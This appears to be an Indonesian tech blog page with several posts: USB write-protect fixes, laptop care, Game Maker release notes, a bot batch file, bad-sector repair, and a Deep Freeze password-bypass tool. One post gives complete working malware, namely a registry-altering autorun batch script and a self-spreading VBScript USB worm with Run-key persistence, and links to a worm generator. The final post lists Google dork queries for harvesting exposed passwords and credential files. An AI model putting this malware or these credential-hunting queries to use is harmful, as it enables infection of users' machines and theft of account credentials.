Translate

Kenapa USB FlashDisk muncul pesan “Write Protect Error”?

Garis besar pada tutorial ini adalah:

- USB FlashDisk kita muncul pesan “Write Protect Error”.
- Kita gak bisa hapus file atau juga copy file dan data-data ke USB Flash Disk kita.
-Ketika kita ingin melakukan format Flash Disk, muncul tulisan “Write Protect”.
-Flash Disk mengalami masalah hanya pada komputer-komputer tertentu saja.


Pesan error yang muncul :

di kasus yang ini adalah, akan ada pesan yang tampil sewaktu kita melakukan format pada flashdisk kita.


Lalu di kasus yang ke dua, sewaktu kita lakukan copy-paste, atau dengan kata lain memindahkan file.


Pesan ini tampil sewaktu kita mau memasukan data hardisk ke flashdisk


Membetulkan dengan cara CHKDSK dan juga kita Format lewat Dos Prompt:

  1. Pertama-tama kita masuk terlebih dahulu ke DOS Prompt yang ada pada Windows XP lalu selanjutnya kita ketikan CHKDSK /F Drive letter : (chkdsk /f v:)
  2. Setelah proses memeriksa Check Disk (CHKDSK) telah berakhir, silahkan kita hapus semua data yang tersimpan dalam Flash Disk, perintah nya adalah “Del drive letter:*.*”(tanpa tanda petik). Contoh perintah menghapus data didalam Flash Disk di drive V: DEL V:*.*
  3. Silahkan coba lagi format menggunakan perintah Dos Promt. Format V:
  4. kita bisa juga menggunakan cara lain, yaitu dengan Computer Management, silahkan perhatikan volume yang ada pada drive V, kemudian kita akan melakukan format. Namun jika tetap muncul pesan error, coba kita booting ulang komputer nya.


Langkah 1


Langkah 2



Langkah 3.4


Hasil

Flashdisk kita akan corrupt. metode pada penjelasan tadi adalah cara untuk membetulkan flashdisk kita yang sudah corrupt dan flashdisk kita juga telah terkena file protect sewaktu kita mau copy-paste (transfer file) serta flashdisk kita gak bisa di format.


Sesudah Flash Disk nya kita format, namun pesan error masih muncul, coba kita booting ulang komputer kita yang tujuan nya agar komputer kita dapat ter-refresh dan agar Windows XP dapat mendeteksi FlashDisk kita.


Namun jika masalah belum juga bisa teratasi, coba ulangi lagi langkah dari awal, Tapi jika masih gagal juga, berarti cara yang sudah saya jelaskan tidak berlaku lagi untuk membetulkan level kerusakan flashdisk anda.


Memang masalah Flash Disk Write Protect kadang-kadang cuma muncil di komputer-komputer tertentu saja, namun di komputer lain ada kemungkinan masih bisa.


Hal lain mungkin saja terjadi bila cara di atas ternyata tidak berfungsi sama sekali.

Download Repair_v2.9.1.1,

Credit: flashdisk write protected,
1 komentar

Anti Deep Freeze v0.2













Dalam Kesempatan sebelumnya saya pernah share kegunaan DEEP FREEZE sebagai Software pelindung untuk microsoft windows XP.

Karena dengan deep freeze versi 5 ke atas anda tak perlu was-was jika ada virus injeksi ke PC/Lepy anda, karena setelah PC anda mati maka settingan windows akan kembali seperti semula seperti settingan awal anda lakukan pertama kali.

Namun karena manusia terkadang kita lupa password Deep freeze...sehingga kita harus install ulang PC....cukup repot juga...tapi sekarang dengan Anti Deep Freeze anda tak perlu lagi instal ulang windows jika password deep freeze anda lupa.


semoga bermanfaat.

0 komentar

Download free Game Maker 8 - The Spr File Editor

Download : Game Maker 8

Game Maker is one of the easiest programs to make your own games or even programs allows you to make exciting computer games without the need to write a single line of code. A very quick and easy way to design your dreams!

Making games with Game Maker is great fun. Using easy to learn drag-and-drop actions you can create professional looking games in little time. You can make games with backgrounds, animated graphics, music and sound effects.

And once you get more experienced there is a built-in programming language that gives you full flexibility. What is best, Game Maker can be used free of charge. And you can use the games you produced in any way you like. You can even sell them!

Game Maker comes with a collection of freeware images and sounds to get you started. Also there are a number of example games.

Requirements:

· 15 MB disk space.
· at least 65000 colors (high color, 16-bit).
· at least 800x600 screen resolution.
· a 3D graphics card compatible with DirectX 8 or higher and with at least 32 MB of video memory is required.
· a DirectX 8 compatible sound card is required. Make sure all graphics and sound card drivers are up to date.
· DirectX 8 or higher is required (not included).


What's New :

- Cut/Copy of a fully transparent image now keeps it transparent rather than making it black.
- Changed the icon for the eraser in the image editor to something more meaningful.
- The color picker now also changes the transparency value.
- When drawing a filled rectangle (or disk, …) without a boundary, the left color is now used.
- When filling you can now indicate whether only the color value should match or also the transparency. Filling transparent areas now works as expected.
- The file selector now works correctly when typing in a file name.
- The sprite file selector can now open multiple files at once.
- When adding sprites in the sprite editor they are now added at the end.
- The Crop transform now uses Ctrl+Alt+O as shortcut.
- Creating too large images or sprites now gives a proper error message.
- Added multiple undo and redo in the sprite editor.
- Sharpen is now disabled in the image editor when there is no image.
- Antialiased shapes now work fine with color mode set to Replace.
- Added keyboard shortcuts for zooming actions and for all drawing actions
- You can now Delete a selection or Cut it to the clipboard
- It is possible to extend a selection with the key and remove parts with the key.
- Right mouse now copies a selection.
- Selection indication is now in a more common way (no longer dark and light).
- There are now magic wand and paint selection tools.
- Some errors in selection were solved.
- Text is now indicated with a box rather than with dark-light.
- Zoom in now only allows multiples of 100%.
- Removed a visual glitch at the boundary of images when zooming out.
- No warning is given when moving to the next subimage of a sprite when a change was made.
- You can now set the transparency of the whole image
- Added a preview image to the image editor
- Selecting a color while painting now no longer changes the interface
- Changed the keyboard shortcuts for the zoom functions to the more common ones.
- Added inside glow effect.
- Used term Opacity rather than transparency.
- You can now set the alpha (opacity) values from an image (using the intensity).
- Added the possibility for pasting from a file.
- The color mode is now used when moving selections or pasting images.
- With shift key you can now make hor/vert lines for the paint, eraser, and pencil tools
- For Crop you can now again specify the size of the border
- Added a Change Color drawing tool.
- You can now change the size and color of the grid and whether to snap to it.

Source: forums.techarena 0 komentar

TIPS MERAWAT LAPTOP AGAR AWET

Di kesempatan yang lalu saya coba share Bagaimana merawat notebook dan hari ini saya coba lebih detail kasus yang sering terjadi.


Berikut beberapa tips sederhana dalam merawat dan menghindarkan laptop Anda dari kerusakan dini sekaligus menambah umur laptop atau notebook Anda :

1. Jangan menaruh laptop dekat minuman untuk mengurangi kemungkinan tersenggol atau tindakan ceroboh lainnya, ketika menggunakan laptop jangan menaruhnya di dekat minuman ataupun segala macam cairan.
jika hal tsb tjd cepat2lah cabut adaptor & lepaskan baterai, bongkar laptop lalu diamkan hingga benar2 kering.

2. Jangan menaruh handphone dekat dengan laptop Peralatan elektronik spt HP, TV,
atau speaker aktif mengeluarkan medan magnet. Medan magnet ini akan mempengaruhi kerja komponen laptop terutama harddisk. untuk melindungi data yang ada di dalamnya, jangan menaruh laptop berdekatan dengan sumber medan magnet tsb. seandainya ingin digunakan sebaiknya hp diletakkan 15-20 cm dari laptop.

3. jangan menaruh laptop di tempat yg panas,
Panas yg berlebihan dapat merusak komponen laptop. jangan pernah menaruhnya ditempat yg panas seperti meninggalkan di mobil dengan tempat parkir yg panas.

4. Jangan menaruh laptop di permukaan yg terlalu empuk,
permukaan yg empuk seperti batal atau kasur dapat menghambat udara panas dari laptop untuk keluar. jika udara panas ini tdk bisa keluar krn terhambat atau tertutup kasur, laptop akan menjadi terlalu panas (overheating).

5. Jangan menaruh laptop di lantai.
Jika menaruhnya di lantai, selain cepat kotor oleh debu, resiko terinjak juga sangat besar. anak kecil atau binatang peliharaan anda bisa saja merusak bagian tertentu dari laptop.

6. Jangan menaruh benda apapun di antara keyboard dan layar laptop.
Mulai sekarang, coba hilangkan kebiasaan meletakkan kertas atau benda lain di atas keyboard laptop. karena resiko layar tergores menjadi besar.

7. Jangan menaruh beban berat di atas laptop.
Menaruh buku yg berat di atas laptop dapat menyebabkan kerusakan pada layar LCD secara permanen. Hindari menaruh buku atau barang lain yg memberikan tekanan pd laptop.

8. Jangan membiasakan membawa/memindahkan laptop dg kondisi hidup.
Mungkin awalnya tdk apa2, tetapi guncangan akibat terlalu sering memindahkan laptop dg
kondisi menyala dapat menyebabkan kerusakan harddisk. Guncangan membuat head harddisk memiliki kemungkinan menggores cylinder harddisk.

9. Jangan membawa laptop di dalam tas yg penuh berisi barang2.
Laptop yg terkena tekanan memperbesar peluang tergoresnya badan laptop dan rusaknya layar LCD.

10. Jangan meminjamkan laptop ke sembarang orang.
Laptop sifatnya personal. dg alasan keamanan data, jangan meminjamkan laptop ke sembarang orang.

11. Jangan bongkar laptop tanpa pengetahuan yg cukup.
Jika laptop masih bergaransi lebih baik dibawa ke tempat servis resminya.

12. Matikan laptop dengan cara yang benar.
Jangan biasakan mematikan laptop dg paksa seperti melepaskan baterai atau menekan tombol power. Bila hal ini terjadi bisa sebabkan kerusakan pd harddisk. Biasakan mematikan laptop dg shutdown.

13. Bersihkan keyboard secara berkala.
Bersihkan dg rutin dengan menyemprotkan udara di sela-sela tombol. jangan mengetuk atau mengguncangkan keyboard dengan keras.

14. Bersihkan layar LCD secara berkala.
Bersihkan LCD dg menggunakan kain yg dpat dibeli di toko komputer. lap dg pelan satu arah, dan lakukan jgn terlalu keras, jangan menyemprotkan cairan pembersih langsung pada layar laptop. jika menggunakan cairan pembersih usahakan sama dengan cairan pembersih
kamera digital.

15. Mengantisipasi tersambar petir.
Pada saat banyak petir saat menggunakan laptop, waspadalah dg mencabut/melepas semua yg terhubung dg laptop. lepas kabel telepon yg terhubung ke modem saat berinternet melalui jaringan LAN.

16. Berhati-hatilah pada saat membuka dan menutup layar laptop.
Antara layar LCD dg badan laptop terdapat engsel yg berfungsi agar LCD dpt bergerak bebas
sesuai kemiringan yg kita inginkan. pada saat membuka dan menutup LCD, jangan
menghentak terlalu keras yg dapat menyebabkan engsel patah.

17. Lepas baterai jika lama tidak digunakan.
Jika berencana menyimpan laptop dalam jangka waktu lama sebaiknya lepaskan baterai dari laptop. hal ini dapat membuat baterai lebih awet.

0 komentar

ext (.BAT) untuk Multiple BOT RENEWAL








Multiple bot berguna untuk anda yg memiliki kapasitas hard disk sedikit, karena dengan multiple bot anda bisa menghemat/mengurangi pemakain isi hard disk untuk bot idRO
( 1x klik .bat bisa nyala banyak bot )

berikut ini adalah penjelas dengan gambar untuk multiple bot degan mengunakan .bat :




1. contohnya gini ,di dalem foder bot kan ada control
nah buat deh didalem folder control bikin folder dengan nama control1
(semisal bot'an vending 1) dan control2 (priest/paketer)




[catatan : isi control1 dan control2 nya sama kayak yg biasa jadi semua lengkap kayak config,macros,mon_control..etc harus lengkap, intinya cuma ganti nama dan pengalihan dari control ke control1 dan control2]

2. terus di sejajar dengan start.exe (control,tables,src,logs,plugins...etc) bikin deh text document semisal namanya nyala.txt isi dari nyala.txt iu dengan :

start start.exe --control=control\control1\
start start.exe --control=control\control2\



[Catatan : bisa di lakukan lebih dari 2 - sampe sekuat2 nya komputer anda ]

3. nah kalo sudah coba save deh, terus ubah format.txt jadi .bat ( dari nyala.txt jadi nyala.bat, bila tidak bisa ikuti petunjuk di bawah) terus klik deh 2x nyala.bat nya dan jadi deh multiplebot


Selesai, happy multiple bot

Catatan : bagi yang tidak bisa save dari .txt ke .bat , ikuti petunjuk berikut

buka folder , lalu pilih tab Tools > Folder Options


bila sudah nanti akan keluar tab folder options, lalu [pilih tab view] , dan setelah itu un-marked/un-check 'Hide extensions for known file types'


lalu tekan apply dan ok, setelah itu anda hanya tinggal me-rename dari nyala.txt ke nyala.bat

Selesai^^

"DOWNLOAD OPENKORE TERBARU VERSI RENEWAL"

0 komentar

Mengatasi Harddisk Bad Sector




Hal yang masih dapat dilakukan untuk memperbaiki harddisk yang terkena bad sector adalah hanya kondisi dimana harddisk masih berputar, keadaan controller harddisk masih bekerja. Tetapi keadaan ini masih dibagi lagi, bila ingin mengunakan harddisk yang terkena bad sector. Masalah penyebab bad sector adalah salah satu kerusakan yang sering terjadi. Kondisi kerusakan oleh bad sector dibedakan oleh 3 keadaan.


Kondisi dimana platter harddisk aus. Pada kondisi ini harddisk memang sudah tidak dapat digunakan. Semakin lama harddisk semakin rusak dan tidak berguna lagi untuk dipakai sebagai media storage.


Kondisi platter yang aus tetapi belum mencapai kondisi kritis. Kondisi ini dapat dikatakan cukup stabil untuk harddisk. Kemungkinan harddisk masih dapat diperbaiki karena platter masih
mungkin dilow level.


Kondisi platter yang aus, baik kondisi yang parah atau ringan tetapi kerusakan terdapat di cluster 0 (lokasi dimana informasi partisi harddisk disimpan). Kondisi ini tidak memungkinkan harddisk diperbaiki.


Membicarakan keadaan harddisk untuk diperbaiki hanya memungkinkan perbaikan pada kondisi ke 2, dimana permukaan harddisk masih stabil tetapi terdapat kerusakan ringan di beberapa tempat.

Tujuan


Upaya untuk mengunakan harddisk yang terdapat bad sector
Men-eliminasi lokasi kerusakan pada bad sector.


Tahapan 1


Sebelum melakukan tahapan selanjutnya sebaiknya mengunakan tahapan 1 untuk memastikan kondisi platter harddisk yang rusak. Untuk mengetahui hal ini harddisk harus dilakukan LOW LEVEL FORMAT (LLF). LLF dapat dilakukan dari BIOS atau Software. Untuk BIOS, beberapa PC lama seperti generasi 486 atau Pentium (586) memiliki option LLF. Atau dapat mengunakan software LLF. Untuk mendapatkan software LLF dapat diambil di Site pembuat harddisk. Atau mencari utiliti file seperti hddutil.exe (dari Maxtor - MaxLLF.exe) dan wipe.exe versi 1.0c 05/02/96.


Fungsi dari software LLF adalah menghapus seluruh informasi baik partisi, data didalam harddisk serta informasi bad sector. Software ini juga berguna untuk memperbaiki kesalahan pembuatan partisi pada FAT 32 dari Windows Fdisk.


Setelah menjalankan program LLF, maka harddisk akan benar-benar bersih seperti kondisi pertama kali digunakan.

Peringatan : Pemakaian LLF software akan menghapus seluruh data didalam harddisk


Tahapan 2

Proses selanjutnya adalah dengan metode try dan error. Tahapan untuk sesi ini adalah :


a. Membuat partisi harddisk : Dengan program FDISK dengan 1 partisi saja, baik primary atau extended partisi. Untuk primary dapat dilakukan dengan single harddisk , tetapi bila menghendaki harddisk sebagai extended, diperlukan sebuah harddisk sebagai proses boot dan telah memiliki primary partisi (partisi untuk melakukan booting).


b. Format harddisk : Dengan FORMAT C: /C. Penambahan perintah /C untuk menjalankan pilihan pemeriksaan bila terjadi bad sector. Selama proses format periksa pada persentasi berapa kerusakan harddisk. Hal ini terlihat pada gambar dibawah ini.


Ketika program FORMAT menampilkan Trying to recover allocation unit xxxxxx, artinya program sedang memeriksa kondisi dimana harddisk tersebut terjadi bad sector. Asumsi pada pengujian dibawah ini adalah dengan Harddisk Seagate 1.2 GB dengan 2 lokasi kerusakan kecil dan perkiraan angka persentasi ditunjukan oleh program FORMAT :Kondisi Display pada program Format persentasi yang dapat digunakan
Baik 0-20% 20%
Bad sector 21% Dibuang
Baik 22-89% 67%
Bad sector 91% Dibuang
Baik 91-100% 9%


c. Buat partisi kembali : Dengan FDISK, buang seluruh partisi didalam harddisk sebelumnya, dan buat kembali partisi sesuai catatan kerusakan yang terjadi. Asumsi pada gambar bawah adalah pembuatan partisi dengan Primary dan Extended partisi. Pada Primary partisi tidak terlihat dan hanya ditunjukan partisi extended. Pembagian pada gambar dibawah ini adalah pada drive D dan F (22MB dan 12 MB) dibuang karena terdapat bad sector. Sedangkan pada E dan G ( 758MB dan 81MB) adalah sebagai drive yang masih dalam kondisi baik dan dapat digunakan.


Bila anda cukup ngotot untuk memperbaiki bad sector anda, dapat juga dilakukan dengan try-error dengan mengulangi pencarian lokasi bad sector pada harddisk secara tahapan yang lebih kecil, misalnya membuat banyak partisi untuk memperkecil kemungkinan terbuangnya space pada partisi yang akan dibuang. Semakin ngotot untuk mencari kerusakan pada tempat dimana terjadi bad sector semakin baik, hanya cara ini akan memerlukan waktu lebih lama walaupun hasilnya memang cukup memuaskan dengan memperkecil lokasi dimana kerusakan harddisk terjadi.


d. Untuk memastikan apa bad sector sudah terletak pada partisi harddisk yang akan dibuang, lakukan format pada seluruh letter drive dengan perintah FORMAT /C. Bila bad sector memang terdapat pada partisi yang dibuang (asumsi pada pengujian bad sector terletak pada letter drive D dan F), maka partisi tersebut dapat langsung dibuang.

Tetapi bila terjadi kesalahan, misalnya kerusakan bad sector tidak didalam partisi...

refrensi : ojelhtc blog 0 komentar

Buat Virus Sederhana Dari Notepad

nih virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

- Virus 1 -

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat


- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

- Virus 2 -
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”

loop

- Virus 3 -

Kamu pasti masih inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :

http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.

Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

note:
- Jangan disalahgunakan, gunakan dengan bijak
- Maaf kalau pernah diposting
- Saya masih Newbie motif saya hanya untuk belajar.

Source 1

Source 2

Source 3 0 komentar

MENCURI USERNAME DAN PASSWORD DARI GOOGLE

google sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai macam variasi pencarian. kita tidak akan membahas berbagai macam operator tersebut, karena judul artikel ini mendapatkan password dan username.

semua tabel dalam artikel ini diambil dari buku
“google hacking for penetration testers”, mungkin ada temen2 yang belum sempet baca jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak usah heran….

TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl:php inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————

TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD

———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
